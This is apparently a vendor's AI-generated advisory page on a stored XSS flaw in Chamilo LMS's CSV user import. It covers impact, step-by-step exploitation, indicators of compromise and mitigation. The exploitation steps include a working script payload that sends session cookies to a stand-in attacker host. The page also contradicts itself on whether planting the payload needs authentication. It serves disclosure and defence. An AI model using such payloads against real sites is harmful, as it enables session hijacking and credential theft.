CVE-2025-52468: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-52468 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS affecting versions up to and including 1.11.28. The flaw exists in the CSV user import functionality, where insufficient sanitization of the "Last Name", "First Name", and "Username" fields allows attackers to inject persistent JavaScript payloads. The vulnerability was disclosed on March 2, 2026, and patched in version 1.11.30. It carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though the GitHub Security Advisory rates it 8.8 (High) (GitHub Advisory, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), classified as a stored XSS vulnerability. When an administrator imports users via CSV, the user_import.php file fails to sanitize the "Last Name", "First Name", and "Username" fields before storing them in the database. The injected payload is subsequently rendered unsanitized when any authenticated user views the compromised user profile, executing arbitrary JavaScript in the victim's browser session. Additionally, unauthenticated users can trigger the payload via the "Who is Online" page (whoisonline.php) when a malicious user is active. The fix, applied in commit 790ef51, adds XSS removal logic during the user import process (GitHub Advisory, Patch Commit).

Impact

Successful exploitation enables persistent JavaScript execution in the context of any authenticated user who views a compromised profile, enabling session hijacking, credential theft, and unauthorized actions performed on behalf of the victim. Both authenticated and unauthenticated users are at risk — unauthenticated attackers can trigger the payload via the public "Who is Online" page. In a worst-case scenario, if an administrator views the malicious profile, the attacker could escalate privileges or perform administrative actions within the LMS (GitHub Advisory).

Exploitability

A proof-of-concept is referenced in the GitHub Security Advisory, and no evidence of active in-the-wild exploitation has been reported as of the disclosure date. The attack requires no authentication to plant the payload (assuming access to the CSV import feature, which typically requires admin privileges) but can be triggered by unauthenticated users via the "Who is Online" page. The EPSS score is approximately 0.045% (very low probability of near-term exploitation). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify a Chamilo LMS instance running version ≤ 1.11.28, accessible via the internet or internal network.
  2. Craft malicious CSV: Prepare a CSV file for user import containing an XSS payload in the "Last Name", "First Name", or "Username" field, e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Import the CSV: Log in as an administrator (or leverage a compromised admin account) and navigate to the user import functionality, uploading the crafted CSV file.
  4. Payload stored: The malicious script is stored in the database without sanitization, associated with the imported user's profile.
  5. Trigger execution: Wait for an authenticated user (or administrator) to view the compromised user profile, or for the malicious user to appear on the public whoisonline.php page, which triggers the stored payload in the victim's browser.
  6. Achieve objective: The executed JavaScript can exfiltrate session cookies, perform actions as the victim, or redirect to attacker-controlled infrastructure for further exploitation (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from users' browsers to unexpected external domains immediately after viewing user profiles or the whoisonline.php page; unusual GET/POST requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: Web server access logs showing requests to whoisonline.php or user profile pages followed by requests to external domains; application logs recording CSV imports with unusual characters (<, >, script) in name or username fields.
  • File System: Presence of CSV import files in upload directories containing HTML/JavaScript tags in name fields.
  • Database: User records in the Chamilo database where firstname, lastname, or username fields contain HTML tags or JavaScript code (e.g., <script>, onerror=, javascript:) (GitHub Advisory).

Mitigation and workarounds

Upgrade Chamilo LMS to version 1.11.30 or later, which applies XSS sanitization during the CSV user import process (Chamilo Release, Patch Commit). As interim mitigations: restrict CSV user import access to highly trusted administrators only; implement Content Security Policy (CSP) headers to limit script execution to trusted origins; and audit existing user records for suspicious content in name and username fields. Organizations should also review recent CSV import history for any entries containing HTML or JavaScript characters.

Community reactions

The vulnerability was reported by researcher NaklehZeidan21 and remediated by developer AngelFQC, as credited in the GitHub Security Advisory. Coverage appeared on The Hacker Wire and was tracked by standard vulnerability aggregators including Vulners and CVEFeed. No significant broader media coverage or notable researcher commentary beyond the advisory has been identified (GitHub Advisory, The Hacker Wire).

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management